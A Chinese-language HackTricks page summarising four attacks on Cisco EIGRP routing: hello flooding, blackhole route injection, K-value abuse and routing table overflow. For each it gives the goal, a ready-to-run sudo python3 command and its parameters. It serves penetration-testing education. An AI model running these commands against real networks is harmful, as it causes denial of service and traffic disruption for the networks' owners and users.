EIGRP攻击
Reading time: 3 minutes
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
这是在 https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 中曝光的攻击摘要。请查看以获取更多信息。
伪造EIGRP邻居攻击
- 目标:通过向路由器发送EIGRP hello数据包来过载路由器CPU,可能导致拒绝服务(DoS)攻击。
- 工具:helloflooding.py脚本。
- 执行: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
- 参数:
--interface
:指定网络接口,例如eth0
。--as
:定义EIGRP自治系统编号,例如1
。--subnet
:设置子网位置,例如10.10.100.0/24
。
EIGRP黑洞攻击
- 目标:通过注入虚假路由来干扰网络流量,导致流量被引导到一个不存在的目的地。
- 工具:routeinject.py脚本。
- 执行: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
- 参数:
--interface
:指定攻击者的系统接口。--as
:定义EIGRP AS编号。--src
:设置攻击者的IP地址。--dst
:设置目标子网IP。--prefix
:定义目标子网IP的掩码。
滥用K值攻击
- 目标:通过注入更改的K值在EIGRP域内创建持续的中断和重新连接,最终导致DoS攻击。
- 工具:relationshipnightmare.py脚本。
- 执行: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
- 参数:
--interface
:指定网络接口。--as
:定义EIGRP AS编号。--src
:设置合法路由器的IP地址。
路由表溢出攻击
- 目标:通过向路由表中填充大量虚假路由来加重路由器的CPU和RAM负担。
- 工具:routingtableoverflow.py脚本。
- 执行: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
- 参数:
--interface
:指定网络接口。--as
:定义EIGRP AS编号。--src
:设置攻击者的IP地址。
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。